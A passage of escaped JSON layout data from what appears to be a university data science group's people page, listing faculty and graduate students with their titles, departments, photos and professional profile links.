Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c443\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c444\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c445\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c446\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c447\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":2,\"id\":\"182-c448\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c449\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c450\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c455\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c456\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c457\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":2,\"id\":\"182-c458\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c459\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c460\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c461\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c462\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c463\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":2,\"id\":\"182-c464\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor <\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c465\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c466\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c467\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c468\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c469\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":2,\"id\":\"182-c470\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c471\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c472\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c473\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c474\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c475\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":2,\"id\":\"182-c476\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c477\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c478\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c479\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c480\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c481\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":2,\"id\":\"182-c482\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c483\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c484\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c426\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c425\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c453\",\"parentId\":\"182-c452\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c452\",\"parentId\":\"182-c451\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c451\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c78\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c78\",\"index\":2,\"id\":\"182-c81\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c78\",\"index\":3,\"id\":\"182-c246\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c78\",\"index\":1,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c72\",\"index\":2,\"id\":\"182-c75\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c72\",\"index\":3,\"id\":\"182-c245\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c72\",\"index\":1,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c84\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c84\",\"index\":2,\"id\":\"182-c87\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c88\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c342\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c343\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c344\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c342\",\"index\":2,\"id\":\"182-c345\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c342\",\"index\":3,\"id\":\"182-c346\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c342\",\"index\":1,\"id\":\"182-c347\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c348\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c349\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c350\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c348\",\"index\":2,\"id\":\"182-c351\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c348\",\"index\":3,\"id\":\"182-c352\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c348\",\"index\":1,\"id\":\"182-c353\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c354\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c355\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c356\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c354\",\"index\":2,\"id\":\"182-c357\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c354\",\"index\":3,\"id\":\"182-c358\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c354\",\"index\":1,\"id\":\"182-c359\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c361\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c362\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c363\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c361\",\"index\":2,\"id\":\"182-c364\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c361\",\"index\":3,\"id\":\"182-c365\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c361\",\"index\":1,\"id\":\"182-c366\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c367\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c368\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c369\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c367\",\"index\":2,\"id\":\"182-c370\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c367\",\"index\":3,\"id\":\"182-c371\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 